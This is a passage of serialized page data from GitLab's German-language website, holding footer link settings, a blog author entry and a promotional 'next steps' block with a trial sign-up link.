Expertin",{"href":48,"dataGaName":49,"dataGaLocation":473},{"text":379,"config":638},{"href":381,"dataGaName":382,"dataGaLocation":473},{"text":384,"config":640},{"href":386,"dataGaName":387,"dataGaLocation":473},{"text":642,"config":643},"Status",{"href":644,"dataGaName":645,"dataGaLocation":473},"https://status.gitlab.com/","status",{"text":647,"config":648},"Nutzungsbedingungen",{"href":649,"dataGaName":650,"dataGaLocation":473},"/terms/","terms of use",{"text":652,"config":653},"Datenschutzerklärung",{"href":654,"dataGaName":655,"dataGaLocation":473},"/de-de/privacy/","privacy statement",{"text":657,"config":658},"Cookie-Einstellungen",{"dataGaName":659,"dataGaLocation":473,"id":660,"isOneTrustButton":102},"cookie preferences","ot-sdk-btn",{"items":662},[663,665,667],{"text":647,"config":664},{"href":649,"dataGaName":650,"dataGaLocation":473},{"text":652,"config":666},{"href":654,"dataGaName":655,"dataGaLocation":473},{"text":657,"config":668},{"dataGaName":659,"dataGaLocation":473,"id":660,"isOneTrustButton":102},"content:shared:de-de:main-footer.yml","Main Footer","shared/de-de/main-footer.yml","shared/de-de/main-footer",[674],{"_path":675,"_dir":676,"_draft":6,"_partial":6,"_locale":7,"content":677,"config":681,"_id":683,"_type":25,"title":14,"_source":27,"_file":684,"_stem":685,"_extension":30},"/en-us/blog/authors/michael-henriksen","authors",{"name":14,"config":678},{"headshot":679,"ctfId":680},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659488/Blog/Author%20Headshots/gitlab-logo-extra-whitespace.png","3DmojnawcJFqAgoNMCpFTX",{"template":682},"BlogAuthor","content:en-us:blog:authors:michael-henriksen.yml","en-us/blog/authors/michael-henriksen.yml","en-us/blog/authors/michael-henriksen",{"_path":687,"_dir":33,"_draft":6,"_partial":6,"_locale":7,"header":688,"eyebrow":689,"blurb":690,"button":691,"secondaryButton":695,"_id":697,"_type":25,"title":698,"_source":27,"_file":699,"_stem":700,"_extension":30},"/shared/de-de/next-steps","Stelle jetzt bessere Software schneller bereit","Mehr als 50 % der Fortune-100-Unternehmen vertrauen GitLab","Erlebe, was dein Team mit der intelligenten\n\n\nDevSecOps-Plattform erreichen kann.\n",{"text":41,"config":692},{"href":693,"dataGaName":44,"dataGaLocation":694},"https://gitlab.com/-/trial_registrations/new?glm_content=default-saas-trial&glm_source=about.gitlab.com/","feature",{"text":46,"config":696},{"href":48,"dataGaName":49,"dataGaLocation":694},"content:shared:de-de:next-steps.yml","Next Steps","shared/de-de/next-steps.yml","shared/de-de/next-steps",1758662282598]